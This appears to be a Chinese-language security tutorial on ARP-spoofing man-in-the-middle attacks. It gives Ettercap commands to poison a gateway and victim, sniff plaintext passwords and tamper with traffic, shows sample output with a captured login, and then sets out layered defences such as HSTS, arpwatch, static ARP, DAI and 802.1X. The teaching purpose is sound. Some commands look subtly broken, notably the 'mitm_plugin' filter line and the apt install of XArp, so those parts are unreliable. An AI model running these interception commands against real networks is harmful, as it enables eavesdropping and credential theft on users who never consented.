网络安全入门攻击与防御实战(二)
攻击原理剖析:
中间人攻击(Man-in-the-Middle Attack)通过劫持通信双方的流量实现数据窃取或篡改。ARP欺骗是经典MITM实现方式:
攻击流程:
1. 攻击者伪造ARP响应包,欺骗目标设备将攻击者MAC地址绑定到网关IP
2. 受害设备所有流量经攻击者主机转发(双向流量劫持)
3. 攻击者可进行流量嗅探/篡改/重定向
Ettercap核心优势:
- 图形化/命令行双模式操作
- 支持ARP/DNS/DHCP等多种欺骗方式
- 集成插件实现密码抓取、会话劫持等高级功能
1. Ettercap实战:ARP欺骗攻击演示
环境准备
# Kali Linux安装Ettercap
sudo apt install ettercap-graphical
# 启用IP转发(避免目标网络中断)
echo 1 > /proc/sys/net/ipv4/ip_forward
攻击指令详解
ARP欺骗启动(命令行模式):
ettercap -T -i eth0 -M arp:remote /192.168.1.1// /192.168.1.100//
-T:使用文本界面-i:指定网卡接口-M arp:remote:启用双向ARP欺骗//分隔符前后分别为网关IP和受害者IP
流量嗅探与劫持:
# 实时捕获HTTP明文密码
ettercap -T -q -i eth0 -P remote_browser
# 修改传输中的图片文件(需加载插件)
ettercap -T -i eth0 --plugin mitm_plugin --filter "*.jpg"
实战结果示例
[HTTP] 192.168.1.100 -> login.example.com
USER: admin PASS: P@ssw0rd123
[DNS] 伪造响应:www.taobao.com -> 攻击者IP
2. 防御体系构建:5层防护策略
1. 强制HTTPS加密传输
Let's Encrypt免费证书部署:
# Nginx配置示例
server {
listen 443 ssl;
ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
add_header Strict-Transport-Security "max-age=63072000" always;
}
2. ARP监控与告警
ARPwatch实时检测:
sudo apt install arpwatch
sudo systemctl start arpwatch
# 查看异常日志
grep "changed ethernet address" /var/log/arpwatch.log
XArp可视化工具:
# 图形化界面安装
sudo apt install xarp
3. 静态ARP绑定
# Linux永久静态ARP绑定
arp -s 192.168.1.1 00:11:22:33:44:55
# Windows命令行绑定
netsh interface ipv4 add neighbors "以太网" 192.168.1.1 00-11-22-33-44-55
4. 网络分段隔离
# 使用VLAN划分网络
switch(config)# vlan 10
switch(config-vlan)# name Finance_Dept
5. 证书锁定(Certificate Pinning)
Android代码示例:
CertificatePinner certificatePinner = new CertificatePinner.Builder()
.add("api.example.com", "sha256/AAAAAAAAAAAAAAAAAAAAAAAA=")
.build();
3. 攻击特征分析(Wireshark抓包对比)
| 特征项 | 正常网络 | ARP欺骗攻击 |
|---|---|---|
| ARP包频率 | 低频请求 | 高频异常响应 |
| MAC-IP映射 | 固定对应关系 | 多IP映射同一MAC |
| 流量模式 | 直接路由 | 经第三方设备转发 |
| DNS响应 | 权威服务器返回 | 攻击者伪造响应 |
| 协议类型 | 加密流量占比高 | 明文协议占比突增 |
4. 企业级防护方案
动态ARP检测(DAI):
Switch(config)# ip arp inspection vlan 10
Switch(config)# ip arp inspection validate src-mac dst-mac ip
802.1X认证:
# FreeRADIUS服务器配置
authorize {
preprocess
auth_log
eap {
ok = return
}
pap
}
全流量加密:
- 部署IPSec VPN隧道
- 启用WireGuard等新型加密协议
终端防护:
- CrowdStrike等EDR工具检测异常网络行为
- 定期进行ARP表健康检查
本章技术总结
| 攻击维度 | 防御措施 | 实施复杂度 |
|---|---|---|
| 数据窃听 | HTTPS全站加密 | ★★☆☆☆ |
| ARP欺骗 | DAI动态检测 | ★★★★☆ |
| 会话劫持 | 证书锁定技术 | ★★★☆☆ |
| 网络层 | 802.1X端口认证 | ★★★★☆ |
扩展学习:
- 使用Wireshark分析SSL/TLS握手过程
- 基于SPAN端口部署IDS检测异常ARP流量
- 企业级网络架构中的微隔离技术